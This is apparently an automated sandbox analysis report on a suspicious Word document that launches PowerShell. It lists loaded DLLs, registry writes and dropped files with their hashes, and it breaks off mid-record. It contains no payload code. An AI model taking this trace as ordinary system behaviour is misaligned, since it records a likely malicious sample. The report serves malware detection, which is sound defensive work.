| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll |
| c:\windows\microsoft.net\framework\v2.0.50727\culture.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll |
| c:\windows\system32\shfolder.dll |
| c:\windows\system32\secur32.dll |
| c:\windows\system32\sspicli.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll |
| c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll |
| c:\windows\system32\ws2_32.dll |
| c:\windows\system32\nsi.dll |
| c:\windows\system32\crypt32.dll |
| c:\windows\system32\msasn1.dll |
| c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll |
| c:\windows\system32\rasapi32.dll |
| c:\windows\system32\rasman.dll |
| c:\windows\system32\rtutils.dll |
| c:\windows\system32\mswsock.dll |
| c:\windows\system32\wshtcpip.dll |
| c:\windows\system32\wship6.dll |
| c:\windows\system32\winhttp.dll |
| c:\windows\system32\webio.dll |
| c:\windows\system32\iphlpapi.dll |
| c:\windows\system32\winnsi.dll |
| c:\windows\system32\dhcpcsvc6.dll |
| c:\windows\system32\dhcpcsvc.dll |
| c:\windows\system32\dnsapi.dll |
| c:\windows\system32\rasadhlp.dll |
| c:\windows\system32\fwpuclnt.dll |
| c:\windows\system32\kernelbase.dll |
| c:\windows\system32\msvcrt.dll |
| c:\windows\system32\rpcrt4.dll |
| c:\windows\system32\user32.dll |
| c:\windows\system32\gdi32.dll |
| c:\windows\system32\lpk.dll |
| c:\windows\system32\usp10.dll |
| c:\windows\system32\ole32.dll |
| c:\windows\system32\oleaut32.dll |
| c:\windows\system32\shlwapi.dll |
| c:\windows\system32\msctf.dll |
| c:\windows\system32\cryptbase.dll |
| c:\windows\system32\clbcatq.dll |
| c:\windows\system32\shell32.dll |
| c:\windows\system32\userenv.dll |
| c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll |
| c:\windows\system32\setupapi.dll |
| c:\windows\system32\propsys.dll |
| c:\windows\system32\ntmarta.dll |
| c:\windows\system32\wldap32.dll |
| c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll |
| c:\windows\system32\security.dll |
| c:\windows\system32\credssp.dll |
| c:\windows\system32\schannel.dll |
| c:\windows\system32\ncrypt.dll |
| c:\windows\system32\bcrypt.dll |
| c:\windows\system32\bcryptprimitives.dll |
| c:\windows\system32\gpapi.dll |
| c:\windows\system32\fveui.dll |
| c:\windows\system32\qagentrt.dll |
| c:\windows\system32\p2pcollab.dll |
| c:\windows\system32\netutils.dll |
Registry activity
Total events
950
Read events
746
Write events
204
Delete events
0
Modification events
PID
Process
Operation
Key
Name
Value
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
Off
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1333919806
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1333919924
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
UISnapshot
1033;1046;1036;1031;1040;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
UIFallback
1040;0;1033;1046;1036;1031;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
HelpFallback
0;1033;1046;1036;1031;1040;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{0C12CF48-451D-45AC-A927-F5FDBFC07C96}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{9C3CFE2A-537A-479A-A1E2-85728C400F7D}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{A8716C2B-35ED-4EE7-A138-FBA0A7C9B5B0}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{AA3BD3AB-AD94-4243-86C5-8AE3D7D829BC}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{BC29864C-2254-4A9E-9F4D-721A388618BB}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\User Settings\Kosmarttag_SmartTag
Count
1
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1333919925
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
StemmerFiles_1042
1333919745
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
B00200008E13CF3A56A9D50100000000
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
}xh
7D786800B002000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(yh
28796800B002000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0
Microsoft Forms 2.0 Object Library
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\FLAGS
6
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\Word8.0
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\38E80E
38E80E
04000000B00200006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F0063004400000066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F006300000000000100000000000000268AC53A56A9D5010EE838000EE8380000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0}h
307D6800B00200000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F006300000000000000
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1333919751
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 2
[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D2FDCA97E47500][O00000000]*C:\Users\admin\Desktop\startedhis.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D5283E319B0580][O00000000]*C:\Users\admin\Desktop\ringeven.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D55414AFD17180][O00000000]*C:\Users\admin\Desktop\costlearning.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D438F4123F0E80][O00000000]*C:\Users\admin\Desktop\purposeaddition.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D294D057076780][O00000000]*C:\Users\admin\Desktop\rssport.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D2F8535C347000][O00000000]*C:\Users\admin\Documents\makeswall.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D280B6AE184B00][O00000000]*C:\Users\admin\Documents\campustax.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D4221667516400][O00000000]*C:\Users\admin\Documents\sortvisual.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
uvh
75766800B0020000010000000000000000000000
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
LanguageList
en-US
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\p2pcollab.dll,-8042
Peer to Peer Trust
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\System32\fveui.dll,-844
BitLocker Data Recovery Agent
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\dnsapi.dll,-103
Domain Name System (DNS) Server Trust
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\qagentrt.dll,-10
System Health Authentication
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\System32\fveui.dll,-843
BitLocker Drive Encryption
Files activity
Executable files
0
Suspicious files
2
Text files
1
Unknown types
11
Dropped files
PID
Process
Filename
Type
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF38ea6f.TMP
binary
MD5:
35375f3d71ae42aa9777154d256b33bf
SHA256:
bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5824C177.wmf
wmf
MD5:
6369dcbb9780f8b3777ed0d8a34d26dd
SHA256:
cede734bacc958bac2dfbcd2f63ed317ac12347a8bcb644a77bec9ab4d7c4862
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5:
35375f3d71ae42aa9777154d256b33bf
SHA256:
bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MWXKZHAO4D1PUA6IY3C.temp
––
MD5:
––
SHA256:
––
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\583402FA.wmf
wmf
MD5:
c47203d05da1ab9caa14c8f4eacce8a7
SHA256:
cdf15a149368dc07c5f2e862d23afb640155edb7c404fca1f954bc2c1ac37ba1
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68EBE19D.wmf
wmf
MD5:
4a02eddd33572b75f460175c3e140d78
SHA256:
44cb4d823d4940d00aa90428866a1b450b006af2105f9d83c5cec0ced588be6a
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3923D0C.wmf
wmf
MD5:
9b61be005486e1474f0e3467462d4456
SHA256:
5a424d39fca19464f45f38f6528124f6172f1034718c1fd3df114fb257ab8f18
688
WINWORD.EXE
